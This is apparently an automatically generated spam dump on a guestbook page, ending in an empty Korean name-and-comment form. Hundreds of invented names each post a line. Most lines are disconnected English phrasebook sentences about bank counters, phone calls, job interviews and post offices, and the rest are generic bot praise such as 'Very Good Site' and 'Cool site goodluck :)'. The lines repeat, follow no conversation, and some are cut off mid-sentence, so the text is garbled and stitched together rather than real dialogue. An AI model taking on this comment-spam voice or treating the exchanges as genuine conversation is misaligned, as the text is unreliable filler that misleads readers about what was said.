Carson : Very Good Site .
Fritz : I'm in a band .
Hiram : How do I get an outside line? .
Quintin : Could you ask him to call me? .
Eva : I'd like to apply for this job .
Salvatore : Could I borrow your phone, please? .
Layla : I'm from England .
Bobbie : this post is fantastic .
Stuart : How do I get an outside line? .
Andreas : Could I make an appointment to see ? .
Herbert : How long are you planning to stay here? .
Berry : I'll text you later .
Snoopy : In tens, please (ten pound notes) .
Salvatore : Who would I report to? .
Jefferey : Is this a temporary or permanent position? .
Roman : We've got a joint account .
Darius : How many days will it take for the cheque to clear? .
Ethan : It's a bad line .
Freddie : I'd like to pay this in, please .
Jonas : I've been made redundant .
Mohammed : Another service? .
Jimmy : I'd like to take the job .
Greenwood : What do you want to do when you've finished? .
Irwin : I'm from England .
Fredric : I wanted to live abroad .
Harris : Could you give me some smaller notes? .
Ruben : Could I ask who's calling? .
Ryan : The National Gallery .
Donte : How much will it cost to send this letter to ? .
Major : How much is a Second Class stamp? .
Demetrius : Very funny pictures .
Alvin : I can't hear you very well .
Werner : What's the current interest rate for personal loans? .
Brant : What part of do you come from? .
Rocco : Will I be paid weekly or monthly? .
Hector : I'm sorry, he's .
Cedrick : I was made redundant two months ago .
Razer22 : Your cash is being counted .
Willard : Do you know what extension he's on? .
Napoleon : Did you go to university? .
Roberto : I want to make a withdrawal .
Kaylee : It's OK furosta .
Benito : Insert your card .
Norris : Will I have to work shifts? .
Raymundo : I hate shopping .
Grady : Another year .
Homer : Directory enquiries .
Corey : I stay at home and look after the children .
Addison : I've only just arrived .
Rufus : Special Delivery .
Jeremy : Another year .
Weldon : I'd like to send this letter by .
Virgilio : Your account's overdrawn .
Orlando : What do you do for a living? .
Willard : I want to make a withdrawal .
Wilber : Jonny was here .
Ruben : I need to charge up my phone .
Daron : I'd like some euros .
Darron : What are the hours of work? .
Amia : I came here to work .
Danny : Whereabouts are you from? .
Kaylee : We'd like to offer you the job .
Mickey : I'm retired .
Horacio : Insufficient funds .
Harris : I read a lot .
Devin : Can I call you back? .
Brian : This is the job description .
Carlton : Very interesting tale .
Issac : Directory enquiries .
Wyatt : Go travelling .
Ollie : We need someone with qualifications .
Ellsworth : A few months .
Nogood87 : Whereabouts in are you from? .
Bryon : I'll call back later .
William : A packet of envelopes .
Dwain : Free medical insurance .
Diana : Could I ask who's calling? .
Benny : A law firm .
Gonzalo : I'd like to cancel this standing order .
Douglas : Where do you study? .
Isidro : A Second Class stamp .
Waldo : Insufficient funds .
Gregg : I'm sorry, I'm not interested .
Perry : Which university are you at? .
Christoper : Could I ask who's calling? .
Simon : Good crew it's cool :) .
Malcolm : Where do you live? .
Mishel : US dollars .
Anthony : How do you do? .
Cedric : Do you know what extension he's on? .
Oswaldo : Have you read any good books lately? .
Juan : In tens, please (ten pound notes) .
Gerardo : I support Manchester United .
Grant : What company are you calling from? .
Giuseppe : I'd like to pay this in, please .
Sheldon : What's your number? .
Cooler111 : good material thanks .
Gaylord : About a year .
Alexis : International directory enquiries .
Valeria : What's the interest rate on this account? .
Autumn : I enjoy travelling .
Michal : Yes, I love it! .
Zachariah : What university do you go to? .
Orville : Do you know what extension he's on? .
Florencio : How many more years do you have to go? .
Abram : Pleased to meet you .
Woodrow : I'll put him on .
Coolman : I'd like to cancel a cheque .
Robbie : Children with disabilities .
Alexis : I hate shopping .
Ralph : I've just graduated .
Gabrielle : Thanks for calling .
Emilio : I'd like to open a business account .
Brendon : How many days will it take for the cheque to clear? .
Brett : How do you spell that? .
Damien : Good crew it's cool :) .
Dexter : Can I take your number? .
Geoffrey : Will I get travelling expenses? .
Angelo : Where are you calling from? .
Marlin : Could I have , please? .
Toney : Whereabouts are you from? .
August : What do you do? .
Nicky : Thanks for calling .
Freelove : I'd like to tell you about a change of address .
Silas : I can't get a signal .
Josue : A Second Class stamp .
Morgan : I can't get through at the moment .
Bella : We need someone with experience .
Jessie : Insufficient funds .
Brock : On another call .
Bonser : I'd like to speak to someone about a mortgage .
Mohammad : I've lost my bank card .
Mckinley : I'd like to open a personal account .
Coolman : Could I have , please? .
Luis : I like watching football .
Lenny : An estate agents .
Terry : I read a lot .
Sydney : I'd like to open a business account .
Trevor : We went to university together .
Weston : How much will it cost to send this letter to ? .
Truman : Excellent work, Nice Design .
Shirley : We work together .
Kyle : I'm a housewife .
Oliver : I didn't go to university .
Monroe : I came here to work .
Randell : I came here to study .
Nicky : Very funny pictures .
Arturo : I like watching TV .
Zachariah : Whereabouts are you from? .
Nicholas : I like it a lot .
Roosevelt : I'm interested in this position .
Fletcher : Is this a temporary or permanent position? .
Jose : The National Gallery .
Isreal : I'm sorry, she's .
Jacob : It's OK .
Bernie : I'll put him on .
Forest : I'm retired .
Tyler : Children with disabilities .
Kyle : I can't get through at the moment .
Major : I'm in my first year at university .
Amber : What do you like doing in your spare time? .
Nicholas : We'll need to take up references .
Destiny : I'm only getting an answering machine .
Damian : Another service? .
Roland : I never went to university .
Shaun : I'd like to tell you about a change of address .
Nevaeh : Some First Class stamps .
Dewitt : What sort of music do you listen to? .
Trent : magic story very thanks .
Diego : I want to report a .
Wilburn : i'm fine good work .
Ricardo : Have you got any experience? .
Clair : Yes, I love it! .
Randy : I'm not interested in football .
Devon : Thanks funny site .
Johnathon : Could I have an application form? .
Amia : I'd like to tell you about a change of address .
Burton : How many days will it take for the cheque to clear? .
Norman : I'd like to speak to someone about a mortgage .
Dorsey : What line of work are you in? .
Wally : Recorded Delivery .
Ellis : I'm sorry, he's .
Errol : How long have you lived here? .
Kieth : Best Site Good Work .
Ollie : The line's engaged .
Broderick : How do you do? .
Lucius : Excellent work, Nice Design .
Cooper : I'm not interested in football .
Jocelyn : Insufficient funds .
Brenton : Have you got any qualifications? .
Emma : Could you send me an application form? .
Aidan : I stay at home and look after the children .
Myron : I study here .
Reginald : Where do you study? .
Esteban : I'm sorry, I didn't catch your name .
Randy : I love this site .
Jeromy : I came here to work .
Coolman : Which team do you support? .
Jewell : Whereabouts are you from? .
Barney : this is be cool 8) .
Dennis : Sorry, I ran out of credit .
Truman : How much will it cost to send this letter to ? .
Scotty : Will I get paid for overtime? .
Cooper : Have you got a current driving licence? .
Keith : Will I have to work on Saturdays? .
Tyrell : It's a bad line .
Sterling : I've only just arrived .
Orville : Could I borrow your phone, please? .
Lazaro : I'm sorry, I didn't catch your name .
Eduardo : I'm afraid that number's ex-directory .
Evan : Please wait .
Cristopher : How many weeks' holiday a year are there? .
Eldridge : Which university are you at? .
Caden : I can't get through at the moment .
Napoleon : I've got a part-time job .
Denny : My battery's about to run out .
Tyrone : Photography .
Monty : I'd like to open a personal account .
Kelley : It's OK .
Cordell : How much were you paid in your last job? .
Graig : It's funny goodluck .
Darell : How many would you like? .
Waldo : Do you know the address? .
Kirby : Do you know the address? .
Rufus : What do you do? .
Bernie : I'd like to order some foreign currency .
Chang : I've got a full-time job .
Sergio : I was made redundant two months ago .
Carlton : One moment, please .
Xavier : I'd like to transfer some money to this account .
Brooks : Where's the postbox? .
Gustavo : I'm not interested in football .
Gerard : I'm self-employed .
Antone : Sorry, you must have the wrong number .
Stephan : I'm at Liverpool University .
Trevor : Pleased to meet you .
Arlie : I'll send you a text .
Wayne : A financial advisor .
Noble : Would you like to leave a message? .
Jules : A staff restaurant .
Michal : I'd like to send this parcel to .
Reggie : Whereabouts in are you from? .
Merlin : How do you spell that? .
Derrick : How much does the job pay? .
Jeffery : I'm interested in this position .
Floyd : I study here .
Kevin : I'm retired .
Benedict : Your cash is being counted .
Jewel : I've got a full-time job .
Renato : How long have you lived here? .
Ulysses : Go travelling .
Ahmad : What's your number? .
Geraldo : Could you give me some smaller notes? .
Broderick : Will I be paid weekly or monthly? .
Irwin : A jiffy bag .
Dominique : There's a three month trial period .
Lucius : Please call back later .
Melanie : How much notice do you have to give? .
Dexter : Whereabouts in are you from? .
Jarrod : What do you want to do when you've finished? .
Blaine : I'd like to change some money .
Simon : I work for a publishers .
Brooks : I'm self-employed .
Zachariah : What do you do? .
Cooler111 : I love the theatre .
Elliott : I never went to university .
Donte : A pension scheme .
Valeria : Have you got a current driving licence? .
Coolman : I'm interested in .
Hilton : Lost credit card .
Hunter : I'm retired .
Stephan : I'd like to withdraw $100, please .
Roderick : I'm on holiday .
Cornell : Please wait .
Oswaldo : This is the job description .
Jeremy : Some First Class stamps .
Vanessa : A packet of envelopes .
Clayton : I live here .
Mariano : I read a lot .
Allen : Can you hear me OK? .
Jaime : I'll put her on .
Darrell : I never went to university .
Kenny : I'm in a band .
Cody : International directory enquiries .
Donny : Who's calling? .
Bobbie : I've got a full-time job .
Morgan : Best Site Good Work .
Cooler111 : I'm on a course at the moment .
Winfred : I don't know what I want to do after university .
Tyrell : We'd like to offer you the job .
Cletus : No, I'm not particularly sporty .
Conrad : Will I have to work shifts? .
Archie : I'd like to apply for this job .
Philip : I'm not working at the moment .
Wilbur : How much is a Second Class stamp? .
Christian : A company car .
Maynard : What's your number? .
Lionel : About a year .
Garry : Directory enquiries .
Federico : I'm sorry, I'm not interested .
Hobert : I've been cut off .
Kasey : Very Good Site .
Freeman : I'll text you later .
Cornell : Sorry, you must have the wrong number .
Darrin : I love the theatre .
Ellis : Could I borrow your phone, please? .
Barton : I wanted to live abroad .
Terry : Through friends .
Kenneth : I stay at home and look after the children .
Dexter : Hold the line, please .
Anibal : I like it a lot .
Orville : Will I have to work shifts? .
Russel : I've just graduated .
Robin : This site is crazy :) .
Boris : Get a job .
Avery : I'm about to run out of credit .
Marshall : We work together .
Mya : Why did you come to ? .
Cortez : Remove card .
Adalberto : I've got a full-time job .
Ronald : Gloomy tales .
Fredric : Canada>Canada .
Trenton : Sorry, I'm busy at the moment .
Layla : Could you transfer $1000 from my current account to my depos .
Shayne : How long have you lived here? .
Logan : I'd like to cancel this standing order .
Garret : I'm on holiday .
Sergio : Where do you live? .
Keven : We went to university together .
Nathanael : I love this site .
Brendon : good material thanks .
Gianna : I'm on a course at the moment .
Orlando : I'm doing an internship .
Rufus : Can I take your number? .
Vance : What's the interest rate on this account? .
Natalie : The line's engaged .
Marshall : I'm on a course at the moment .
Christoper : Have you got any qualifications? .
Wally : It's funny goodluck .
Romeo : I'm unemployed .
Ezekiel : Where do you come from? .
Nolan : A few months .
Wilford : When can you start? .
Eusebio : Hold the line, please .
Berry : I'm at Liverpool University .
Buster : I can't hear you very well .
Wilton : I work with computers .
Lucas : A company car .
Gerald : The National Gallery .
Darius : Where's the nearest cash machine? .
Clayton : I can't hear you very well .
Isabel : Where's the postbox? .
Roland : What part of do you come from? .
Wesley : I like watching TV .
Craig : About a year .
Rusty : I like watching TV .
Major : On another call .
Stanley : I'm doing a masters in law .
Lamont : I've got a very weak signal .
Amado : How do you do? .
Brock : Will I get paid for overtime? .
Foster : I'm about to run out of credit .
Madeline : I'd like to apply for this job .
Josue : Not in at the moment .
Donnie : I'm on business .
Serenity : Have you got a telephone directory? .
Trevor : I don't know what I want to do after university .
Silas : I'd like to pay this in, please .
Monroe : Cool site goodluck :) .
Gobiz : Did you go to university? .
Mariano : I'm self-employed .
Edgar : I've got a very weak signal .
Seth : Children with disabilities .
Nogood87 : Photography .
Herbert : Insert your card .
Trinity : The line's engaged .
Henry : Have you got any qualifications? .
Hosea : Other amount .
Pasquale : Stolen credit card .
Sofia : A book of First Class stamps .
Julio : An accountancy practice .
Jane : I want to report a .
Mia : I'd like to tell you about a change of address .
Kevin : Not available at the moment .
Carson : magic story very thanks .
Garth : Yes, I play the guitar .
Maxwell : I'll send you a text .
Lincoln : Withdraw cash .
Leroy : I'd like to open an account .
Andreas : What do you study? .
Tyrone : Very funny pictures .
Zackary : very best job .
Melissa : Could I make an appointment to see ? .
Brain : Can I call you back? .
Antonia : What sort of work do you do? .
Cody : I'm self-employed .
Chauncey : Is it convenient to talk at the moment? .
Gaston : International directory enquiries .
Elden : Will I have to work shifts? .
Shaun : Thanks funny site .
Kenny : What do you like doing in your spare time? .
Mohammed : A few months .
Francesco : What's the exchange rate for euros? .
Leroy : I've been cut off .
Wayne : A packet of envelopes .
Gerardo : magic story very thanks .
Anibal : Thanks funny site .
Marty : What do you like doing in your spare time? .
Chung : Could I borrow your phone, please? .
Hosea : I'll call back later .
Erwin : this post is fantastic .
Santiago : How many more years do you have to go? .
Infest : Could you give me some smaller notes? .
Giovanni : I read a lot .
Eduardo : It's OK .
Jimmi : I like it a lot .
Aaron : I have my own business .
Timothy : Do you know the number for ? .
Percy : Looking for a job .
Ricardo : Photography .
Carroll : Which team do you support? .
Jaden : I love this site .
Aaron : How do you spell that? .
Adam : Nice to meet you .
Randy : Accountant supermarket manager .
Samual : Incorrect PIN .
Colin : How many weeks' holiday a year are there? .
Patricia : Could I take your name and number, please? .
Santiago : Children with disabilities .
Hilario : Where do you come from? .
Williams : perfect design thanks .
Randell : Please wait .
Deangelo : Children with disabilities .
Dewitt : I'm on holiday .
Goodboy : I'd like to pay this cheque in, please .
Gabriella : Do you have any exams coming up? .
Woodrow : Incorrect PIN .
Rusty : How do you spell that? .
Franklin : I hate shopping .
Jarod : perfect design thanks .
Bruce : A pension scheme .
Madelyn : Whereabouts in are you from? .
Elliott : I work here .
Lamont : The manager .
Basil : I'd like to transfer some money to this account .
Sylvester : Are you a student? .
Josue : A book of First Class stamps .
Michal : I don't know what I want to do after university .
Anthony : How many weeks' holiday a year are there? .
Laverne : It's a bad line .
Malcolm : I'd like to withdraw $100, please .
Sammy : We were at school together .
Willy : I love this site .
Jimmi : Three years .
Dwight : I'd like to change some money .
Gavin : An estate agents .
Berry : We've got a joint account .
Casey : We work together t .
Emily : Could you send me an application form? .
Ryan : I've been cut off .
Kayla : Have you got any qualifications? .
Damien : It's OK .
Nathanial : How much were you paid in your last job? .
Carson : Your cash is being counted .
Allison : Can I use your phone? .
Maya : Can I call you back? .
Burton : Free medical insurance .
Stacy : Will I get travelling expenses? .
Lyman : I like watching TV .
Hector : How do you do? .
Shaun : How many more years do you have to go? .
Paris : Could I have , please? .
Clark : What's the exchange rate for euros? .
Tracey : Have you seen any good films recently? .
Doyle : I need to charge up my phone .
Simon : I'd like to cancel a cheque .
Genaro : I like watching TV .
Carlton : A book of First Class stamps .
Getjoy : Withdraw cash .
Garland : Lost credit card .
Columbus : What sort of work do you do? .
Adrian : I live here .
Elvis : Another year p .
Hassan : very best job .
Bobber : I work here .
Edwardo : What do you want to do when you've finished? .
Gerard : What do you do? .
Wesley : Three years .
Jasper : I'm from England .
Loren : I'd like to cancel this standing order .
Lowell : Are you a student? .
Sheldon : What line of work are you in? .
Kurtis : When can you start? .
Issac : We'd like to invite you for an interview .
Brooklyn : I can't hear you very well .
Mervin : I work for a publishers .
Sherwood : I've got a very weak signal .
Norberto : I sing in a choir .
Noble : I'm doing a phd in chemistry .
Behappy : Do you know the address? .
Jessie : We need someone with experience .
Keven : We were at school together .
Cameron : This is your employment contract .
Jonah : On another call .
Lyndon : I don't know what I want to do after university .
Snoopy : How would you like the money? .
Matthew : An envelope .
Shane : Do you need a work permit? .
Milton : Could I have , please? .
Jarrod : I like watching TV .
Bella : Could I make an appointment to see ? .
Lawrence : When do you want me to start? .
Kelley : We used to work together .
Sterling : What do you do? .
Tony : Can I call you back? .
Rafael : I'm a housewife .
Jack : No, I'm not particularly sporty v .
Jeffery : I can't get a signal .
Buster : I came here to work .
Aubrey : Insufficient funds .
Theodore : perfect design thanks .
Brody : How long have you lived here? .
Willard : magic story very thanks .
Wilfredo : Can I call you back? .
Chance : I'll put him on .
Sanford : Why did you come to ? .
Noah : Have you got any qualifications? .
Fermin : We went to university together .
Frederic : I saw your advert in the paper .
Cyrus : A financial advisor .
Samantha : We need someone with qualifications .
Jamel : I love this site d .
Louis : Just over two years .
Josue : This is the job description .
Willie : This site is crazy :) .
Lightsoul : I work for a publishers .
Elroy : How do I get an outside line? .
Rodney : Just over two years .
Shelton : This is the job description .
Addison : A book of First Class stamps .
Chadwick : I can't hear you very well .
Orval : I'd like to open an account .
Fifa55 : Photography .
Rodrigo : This is your employment contract .
Zachariah : Have you got any qualifications? .
Kelvin : A staff restaurant .
Dennis : What are the hours of work? .
Brock : Can you hear me OK? .
Benny : I've just started at .
Winston : I'm on a course at the moment .
Emmett : I'm in a band .
Barton : Cool site goodluck :) .
Jimmy : Cool site goodluck :) .
Abram : It's OK .
Steve : I enjoy travelling .
Raymon : Incorrect PIN .
Craig : A First Class stamp .
Hannah : Sorry, you must have the wrong number .
Crazyfrog : I'm in a band .
Rodolfo : Do you have any exams coming up? .
Brody : Excellent work, Nice Design .
Emma : I don't like pubs .
Valeria : I want to make a withdrawal .
Shannon : Could you tell me the dialing code for ? .
Tyree : Withdraw cash .
Percy : Another year .
Mia : How much notice do you have to give? .
Sherman : Will I be paid weekly or monthly? .
Leopoldo : Which year are you in? .
Earle : Photography .
Haywood : Through friends .
Ethan : Free medical insurance .
Oswaldo : Pleased to meet you .
Rachel : Stolen credit card .
Roosevelt : I'd like to pay this cheque in, please .
Bella : Languages .
Colin : Where do you live? .
Roderick : I'm a member of a gym .
Guadalupe : What do you study? .
Lucien : I'm not working at the moment .
Isaiah : Canada>Canada .
Ernest : Where's the nearest cash machine? .
Darell : Can I take your number? .
Quintin : Could you tell me my balance, please? .
Bella : I'm a trainee .
Emile : I'm sorry, I'm not interested .
Enoch : How much is a Second Class stamp? .
Kirby : Could I take your name and number, please? .
Armand : It's funny goodluck .
Jaden : A staff restaurant .
Bernie : Thanks for calling .
Tyson : Sorry, I'm busy at the moment .
Carmine : What's the current interest rate for personal loans? .
Lonny : Have you got any qualifications? .
Ariana : A jiffy bag .
Benton : I've been made redundant .
Jimmi : I'm a trainee .
Gerardo : Which year are you in? .
Efren : I've got a part-time job .
Hosea : I'm doing a phd in chemistry .
Deandre : History .
Deandre : A few months .
Randy : It's a bad line .
Bryant : Directory enquiries .
Gaston : What university do you go to? .
Scott : I'm a housewife .
Sonny : Very funny pictures .
Bruce : A pension scheme .
Janni : No, I'm not particularly sporty .
Riley : I'd like to cancel a cheque .
Kermit : Sorry, I ran out of credit .
Damien : Get a job .
Numbers : i'm fine good work .
Jose : Thanks for calling .
Jeffery : I don't like pubs .
Fletcher : I'm sorry, I didn't catch your name .
Foster : I live here .
Merrill : Could I take your name and number, please? .
Carroll : I have my own business .
Mishel : I'd like to speak to someone about a mortgage .
Russel : I'd like to take the job .
Marshall : I never went to university .
Nicole : A packet of envelopes .
Hannah : Is it convenient to talk at the moment? .
Mike : Who would I report to? .
Robbie : I'll text you later .
Domenic : I've just started at .
Bobby : I love the theatre .
Jonathon : Gloomy tales .
Gerry : Where did you go to university? .
Trinity : What's the current interest rate for personal loans? .
Stanley : Which university are you at? .
Alonso : How much does the job pay? .
Clement : I'll put her on .
Jasmine : I'm afraid that number's ex-directory .
Victoria : How do you do? .
Virgilio : I'd like to speak to someone about a mortgage .
Sheldon : What company are you calling from? .
Lionel : I'd like to open an account .
Layla : I'm on a course at the moment .
Benton : Which year are you in? .
Jamar : this is be cool 8) .
Cameron : What sort of music do you listen to? .
Lavern : Why did you come to ? .
Wilber : We work together .
Antonio : Have you got any ? .
Aiden : I'm sorry, she's .
Gracie : I've come to collect a parcel .
Lowell : What do you like doing in your spare time? .
Leonard : Cool site goodluck :) .
Elmer : I'm not interested in football .
Sylvester : In a meeting .
Jimmie : Children with disabilities .
Brain : In tens, please (ten pound notes) .
Dwight : Not available at the moment .
Cristobal : Enter your PIN .
Weldon : Canada>Canada .
Arthur : Cool site goodluck :) .
Trent : Could you ask her to call me? .
Bob : When can you start? .
Gianna : Yes, I love it! .
Grady : I've got a very weak signal .
Coleman : This site is crazy :) .
Arnulfo : I'll put him on .
Seth : Please wait .
Reginald : Pleased to meet you .
Jason : What sort of music do you listen to? .
Chang : How many weeks' holiday a year are there? .
Quintin : A jiffy bag .
Antoine : Cool site goodluck :) .
Napoleon : I'm sorry, she's .
Cole : A packet of envelopes .
Miles : What do you study? .
Foster : I wanted to live abroad .
Jarred : What do you study? .
Austin : I live in London .
Elijah : When can you start? .
Natalie : I'm sorry, she's .
Ivory : Do you like it here? .
Brett : I'm about to run out of credit .
Colton : It's serious .
Tristan : I need to charge up my phone .
Garth : I'd like to pay this cheque in, please .
Nestor : How do I get an outside line? .
Kasey : Excellent work, Nice Design .
Rodney : I'd like to cancel a cheque .
Floyd : Not in at the moment .
Glenn : Do you know each other? .
Leslie : What sort of work do you do? .
Rudolph : I like watching football .
Maxwell : Through friends .
Harlan : A pension scheme .
Shelby : Your account's overdrawn .
Gregorio : Until August v .
Kelley : Yes, I love it! .
Leonard : Who do you work for? .
Calvin : Where do you study? .
John : We'd like to invite you for an interview .
Johnnie : I came here to work .
Reggie : I was made redundant two months ago .
Geoffrey : We went to university together .
Ian : A First Class stamp .
Demarcus : I'd like to speak to someone about a mortgage .
Curtis : I've only just arrived .
Alexandra : What do you do? .
Arden : What's the last date I can post this to to arrive in time f .
Monte : Could I have , please? .
Anton : How long are you planning to stay here? .
Woodrow : How much will it cost to send this letter to ? .
Maya : Please call back later .
Liam : I've just started at .
Luke : I'm from England .
Ricardo : Very funny pictures .
Efren : I work for myself .
Edison : I stay at home and look after the children .
Carol : A staff restaurant .
Bryon : I'd like a phonecard, please .
Chadwick : I've got a part-time job .
Julius : Could you give me some smaller notes? .
Waylon : I've lost my bank card .
Nathanial : I read a lot .
Michale : I like it a lot .
Ramiro : US dollars .
Hannah : Could I have an application form? .
Octavio : It's funny goodluck .
Dannie : I'd like some euros .
Renato : Could you give me some smaller notes? .
Adolph : I'd like to withdraw $100, please .
Angelina : No, I'm not particularly sporty .
Marcelo : I'd like to withdraw $100, please .
Randolph : We'd like to offer you the job .
Bob : I'm sorry, he's .
Jimmi : Where did you go to university? .
Hershel : I'm a member of a gym .
Jamel : How many are there in a book? .
Kristofer : I've only just arrived .
Jimmy : What qualifications have you got? .
Everette : About a year .
Brett : An estate agents .
Antony : I'd like to speak to someone about a mortgage .
Salvatore : We need someone with experience .
Weldon : Could I ask who's calling? .
Jerrold : Could I have , please? .
Porter : Please wait .
Richie : Your cash is being counted .
Demarcus : this post is fantastic .
Jeffry : We'd like to offer you the job .
Clifford : real beauty page rop .
Francisco : When can you start? .
Eli : I'm sorry, I'm not interested .
Diva : I've lost my bank card .
Bennett : I live here .
Ronnie : Accountant supermarket manager .
Justin : perfect design thanks  

 

이름 :   내용 :